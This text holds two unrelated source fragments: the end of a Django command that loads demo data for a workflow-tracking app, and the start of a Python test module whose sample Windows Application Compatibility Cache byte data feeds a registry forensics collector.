created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=44,
achieved="500.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[6]],
)
factories.CollectedData(
id=45,
achieved="2300.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=46,
achieved="700.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[7]],
)
def _create_workflowlevel1_sectors(self):
factories.WorkflowLevel1Sector(
id=1,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[14], # 143
sub_sector=[self._sectors[37], self._sectors[38], self._sectors[39], self._sectors[40], self._sectors[41]], # [166, 167, 168, 169, 170]
)
factories.WorkflowLevel1Sector(
id=2,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[5], # 134
sub_sector=[self._sectors[13], self._sectors[83], self._sectors[84]], # [142, 212, 213]
)
factories.WorkflowLevel1Sector(
id=3,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[101], # 230
sub_sector=[self._sectors[10], self._sectors[102], self._sectors[103], self._sectors[104], self._sectors[105]], # [139, 231, 232, 233, 234]
)
factories.WorkflowLevel1Sector(
id=4,
workflowlevel1=self._workflowlevel1s[1], # 10
sector=self._sectors[49], # 178,
sub_sector=[self._sectors[14]], # [143]
)
factories.WorkflowLevel1Sector(
id=5,
workflowlevel1=self._workflowlevel1s[6],
sector=self._sectors[31],
sub_sector=[self._sectors[36], self._sectors[34], self._sectors[32], self._sectors[33], self._sectors[35]],
)
factories.WorkflowLevel1Sector(
id=6,
workflowlevel1=self._workflowlevel1s[6],
sector=self._sectors[109],
sub_sector=[self._sectors[84], self._sectors[98], self._sectors[31]],
)
def _create_workflowteams(self):
factories.WorkflowTeam(
id=1, # 2
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[1], # 10
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=2, # 3
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[2], # 11
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=3, # 4
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[2], # 11
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=4, # 13
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[1], # 10
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=5, # 16
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[3], # 15
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=6, # 17
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[3], # 15
role=self._groups[3], # 3
)
def _create_internationalizations(self):
if settings.INTERNATIONALIZATION_RESOURCE_URL:
url_subpath = '/api/internationalization/'
url = urljoin(settings.INTERNATIONALIZATION_RESOURCE_URL,
url_subpath)
response = requests.get(url)
data = json.loads(response.content)
for translation_data in data:
factories.Internationalization(
language=translation_data['language'],
language_file=translation_data['language_file'],)
else:
            logger.warning('Translations could not be fetched. '
                           'INTERNATIONALIZATION_RESOURCE_URL is not set')
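    # Hedged sketch of the payload _create_internationalizations() above
    # expects from INTERNATIONALIZATION_RESOURCE_URL. Only the 'language' and
    # 'language_file' keys are taken from the code; the values are
    # illustrative:
    #
    #     [
    #         {"language": "de", "language_file": "<serialized translations>"},
    #         {"language": "es", "language_file": "<serialized translations>"}
    #     ]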
def _reset_sql_sequences(self):
"""
        After adding all rows to the database with hardcoded IDs, the primary
        key counter of each table is not automatically updated. This method
        resets the primary key sequences for all affected apps.
"""
os.environ['DJANGO_COLORS'] = 'nocolor'
for app in self.APPS:
buf = StringIO()
call_command('sqlsequencereset', app, stdout=buf)
buf.seek(0)
sql_commands = buf.getvalue().splitlines()
sql_commands_clean = []
for command in sql_commands:
                # As we are already inside a transaction thanks to the
                # transaction.atomic decorator, we don't need the COMMIT and
                # BEGIN statements. If a problem occurs, the transaction is
                # rolled back automatically.
if command not in ('COMMIT;', 'BEGIN;'):
sql_commands_clean.append(command)
cursor = connection.cursor()
cursor.execute("\n".join(sql_commands_clean))
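    # Hedged illustration of the statements _reset_sql_sequences() above ends
    # up executing on PostgreSQL (the table name is an example; the exact SQL
    # is whatever `sqlsequencereset` emits for the database backend in use):
    #
    #     SELECT setval(pg_get_serial_sequence('"workflow_workflowteam"','id'),
    #                   coalesce(max("id"), 1), max("id") IS NOT null)
    #     FROM "workflow_workflowteam";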
def _assign_workflowteam_current_users(self):
role = Group.objects.get(name=ROLE_VIEW_ONLY)
wflvl1_0 = WorkflowLevel1.objects.get(
id=DEFAULT_WORKFLOW_LEVEL_1S[0][0])
wflvl1_1 = WorkflowLevel1.objects.get(
id=DEFAULT_WORKFLOW_LEVEL_1S[1][0])
tola_user_ids = TolaUser.objects.values_list('id', flat=True).all()
wfteams_0 = [
WorkflowTeam(workflow_user_id=user_id, role=role,
workflowlevel1=wflvl1_0)
for user_id in tola_user_ids
]
wfteams_1 = [
WorkflowTeam(workflow_user_id=user_id, role=role,
workflowlevel1=wflvl1_1)
for user_id in tola_user_ids
]
WorkflowTeam.objects.bulk_create(wfteams_0)
WorkflowTeam.objects.bulk_create(wfteams_1)
def add_arguments(self, parser):
parser.add_argument('--demo', action='store_true',
help='Loads extra demo data')
parser.add_argument('--restore', action='store_true',
                            help=('Restores the demo data, deleting the '
                                  'previously loaded data first (except '
                                  'users)'))
@transaction.atomic
def handle(self, *args, **options):
if not settings.DEFAULT_ORG:
msg = ('A DEFAULT_ORG needs to be set up in the configuration to '
'run the script.')
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise ImproperlyConfigured(msg)
if options['restore']:
self.stdout.write('Clearing up database')
self._clear_database()
self.stdout.write('Creating basic data')
self._create_organization()
self._create_site()
self._create_groups()
self._create_countries()
self._create_sectors()
self._create_indicator_types()
self._create_internationalizations()
if options['demo'] or options['restore']:
self.stdout.write('Creating demo data')
try:
self._create_users()
self._create_site_profiles()
self._create_stakeholders()
self._create_milestones()
self._create_workflow_1s()
self._create_workflow_2s()
self._create_levels()
self._create_frequencies()
self._create_indicators()
self._create_periodic_targets()
self._create_collected_data()
self._create_workflowlevel1_sectors()
self._create_workflowteams()
except (IntegrityError, ValidationError):
msg = ("Error: the data could not be populated in the "
"database. Check that the affected database tables are "
"empty.")
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise
self.stdout.write('Resetting SQL sequences')
self._reset_sql_sequences()
if options['restore']:
self.stdout.write('Assigning current users to created projects')
self._assign_workflowteam_current_users()
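# Hedged usage sketch: the management command name is the name of this module
# under management/commands/ (not shown here), so <command_name> below is a
# placeholder.
#
#     python manage.py <command_name>             # basic data only
#     python manage.py <command_name> --demo      # basic data plus demo data
#     python manage.py <command_name> --restore   # clear demo data (keeping
#                                                 # users) and reload it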
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the Application Compatibility Cache collector."""
import unittest
from dfwinreg import definitions as dfwinreg_definitions
from dfwinreg import fake as dfwinreg_fake
from dfwinreg import registry as dfwinreg_registry
from winregrc import appcompatcache
from winregrc import output_writers
from tests import test_lib
_CACHE_DATA_WINDOWS_XP = bytes(bytearray([
0xef, 0xbe, 0xad, 0xde, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00, 0x3f, 0x00, 0x5c, 0x00,
0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x49, 0x00, 0x4e, 0x00,
0x44, 0x00, 0x4f, 0x00, 0x57, 0x00, 0x53, 0x00, 0x5c, 0x00, 0x73, 0x00,
0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x33, 0x00,
0x32, 0x00, 0x5c, 0x00, 0x68, 0x00, 0x74, 0x00, 0x69, 0x00, 0x63, 0x00,
0x6f, 0x00, 0x6e, 0x00, 0x73, 0x00, 0x2e, 0x00, 0x64, 0x00, 0x6c, 0x00,
0x6c, 0x00, 0x00, 0x00, 0x44, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x6e, 0x00,
0x6c, 0x00, 0x6f, 0x00, 0x61, 0x00, 0x64, 0x00, 0x5c, 0x00, 0x62, 0x00,
0x37, 0x00, 0x66, 0x00, 0x30, 0x00, 0x62, 0x00, 0x32, 0x00, 0x38, 0x00,
0x39, 0x00, 0x32, 0x00, 0x62, 0x00, 0x32, 0x00, 0x31, 0x00, 0x32, 0x00,
0x31, 0x00, 0x31, 0x00, 0x61, 0x00, 0x35, 0x00, 0x36, 0x00, 0x33, 0x00,
0x30, 0x00, 0x35, 0x00, 0x31, 0x00, 0x38, 0x00, 0x64, 0x00, 0x30, 0x00,
0x35, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00, 0x38, 0x00, 0x64, 0x00,
0x39, 0x00, 0x5c, 0x00, 0x75, 0x00, 0x70, 0x00, 0x64, 0x00, 0x61, 0x00,
0x74, 0x00, 0x65, 0x00, 0x5c, 0x00, 0x75, 0x00, 0x70, 0x00, 0x64, 0x00,
0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00,
0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0xe9, 0x54, 0x2b, 0x7a, 0xc4, 0x01,
0x00, 0xae, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0xd3, 0x0e, 0xc7,
0xe9, 0x39, 0xca, 0x01
]))
_CACHE_DATA_WINDOWS_2003 = bytes(bytearray([
0xfe, 0x0f, 0xdc, 0xba, 0x01, 0x00, 0x00, 0x00, 0x72, 0x00, 0x74, 0x00,
0x20, 0x00, 0x00, 0x00, 0x00, 0x35, 0x86, 0x76, 0x44, 0xf2, 0xc2, 0x01,
0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00,
0x3f, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00,
0x49, 0x00, 0x4e, 0x00, 0x44, 0x00, 0x4f, 0x00, 0x57, 0x00, 0x53, 0x00,
0x5c, 0x00, 0x4d, 0x00, 0x69, 0x00, 0x63, 0x00, 0x72, 0x00, 0x6f, 0x00,
0x73, 0x00, 0x6f, 0x00, 0x66, 0x00, 0x74, 0x00, 0x2e, 0x00, 0x4e, 0x00,
0x45, 0x00, 0x54, 0x00, 0x5c, 0x00, 0x46, 0x00, 0x72, 0x00, 0x61, 0x00,
0x6d, 0x00, 0x65, 0x00, 0x77, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x76, 0x00, 0x31, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x2e, 0x00,
0x34, 0x00, 0x33, 0x00, 0x32, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x6e, 0x00,
0x67, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00,
0x65, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_VISTA = bytes(bytearray([
0xfe, 0x0f, 0xdc, 0xba, 0x01, 0x00, 0x00, 0x00, 0x46, 0x00, 0x48, 0x00,
0x20, 0x00, 0x00, 0x00, 0xc2, 0xfe, 0x87, 0x5e, 0x7b, 0xfe, 0xc6, 0x01,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00,
0x3f, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00,
0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,
0x5c, 0x00, 0x53, 0x00, 0x59, 0x00, 0x53, 0x00, 0x54, 0x00, 0x45, 0x00,
0x4d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x49, 0x00,
0x53, 0x00, 0x50, 0x00, 0x54, 0x00, 0x49, 0x00, 0x53, 0x00, 0x2e, 0x00,
0x45, 0x00, 0x58, 0x00, 0x45, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_8_0 = bytes(bytearray([
0x80, 0x00, 0x00, 0x00, 0x2e, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x09, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4a, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x30, 0x74, 0x73,
0x9e, 0x6b, 0x3c, 0x8a, 0x68, 0x00, 0x00, 0x00, 0x52, 0x00, 0x53, 0x00,
0x59, 0x00, 0x53, 0x00, 0x56, 0x00, 0x4f, 0x00, 0x4c, 0x00, 0x5c, 0x00,
0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,
0x73, 0x00, 0x5c, 0x00, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
0x65, 0x00, 0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x77, 0x00,
0x62, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x6d, 0x00,
0x69, 0x00, 0x50, 0x00, 0x72, 0x00, 0x76, 0x00, 0x53, 0x00, 0x45, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x43, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0xf0, 0xa4, 0xa4, 0xbc, 0xfc, 0xed, 0xcc, 0x01,
0x00, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_8_1 = bytes(bytearray([
0x80, 0x00, 0x00, 0x00, 0x09, 0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x09, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x46, 0x15, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00,
0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x38, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0x30, 0x74, 0x73,
0xbc, 0x4c, 0xa0, 0x05, 0x5e, 0x00, 0x00, 0x00, 0x46, 0x00, 0x53, 0x00,
0x59, 0x00, 0x53, 0x00, 0x56, 0x00, 0x4f, 0x00, 0x4c, 0x00, 0x5c, 0x00,
0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,
0x73, 0x00, 0x5c, 0x00, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
0x65, 0x00, 0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x64, 0x00,
0x6c, 0x00, 0x6c, 0x00, 0x68, 0x00, 0x6f, 0x00, 0x73, 0x00, 0x74, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x00, 0x00, 0x7f, 0x00,
0x00, 0x00, 0x00, 0x11, 0x00, 0x01, 0xb5, 0x1f, 0x73, 0x13, 0x34, 0x9f,
0xce, 0x01, 0x00, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_10 = bytes(bytearray([
0x30, 0x00, 0x00, 0x00, 0x0a, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc9, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x31, 0x30, 0x74, 0x73, 0x64, 0x7e, 0xcd, 0xc9, 0xcc, 0x00, 0x00, 0x00,
0x42, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x69, 0x00,
0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x5c, 0x00,
0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00,
0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x4d, 0x00, 0x70, 0x00, 0x53, 0x00,
0x69, 0x00, 0x67, 0x00, 0x53, 0x00, 0x74, 0x00, 0x75, 0x00, 0x62, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x80, 0x99, 0xe3, 0x66,
0x30, 0xd6, 0xcf, 0x01, 0x7c, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x20, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_10_CREATOR = bytes(bytearray([
0x34, 0x00, 0x00, 0x00, 0x1a, 0x4e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x53, 0x07, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x7a, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xfa, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x31, 0x30, 0x74, 0x73, 0xd5, 0xf1, 0x23, 0x93,
0xd4, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00,
0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x67, 0x00, 0x72, 0x00, 0x61, 0x00,
0x6d, 0x00, 0x20, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00,
0x73, 0x00, 0x20, 0x00, 0x28, 0x00, 0x78, 0x00, 0x38, 0x00, 0x36, 0x00,
0x29, 0x00, 0x5c, 0x00, 0x4e, 0x00, 0x56, 0x00, 0x49, 0x00, 0x44, 0x00,
0x49, 0x00, 0x41, 0x00, 0x20, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00,
0x70, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00,
0x6f, 0x00, 0x6e, 0x00, 0x5c, 0x00, 0x33, 0x00, 0x44, 0x00, 0x20, 0x00,
0x56, 0x00, 0x69, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00,
0x5c, 0x00, 0x6e, 0x00, 0x76, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00,
0x65, 0x00, 0x67, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00,
0xe9, 0x09, 0x99, 0x7b, 0xa8, 0x9e, 0xd2, 0x01, 0x48, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x4c, 0x01, 0x00, 0x00,
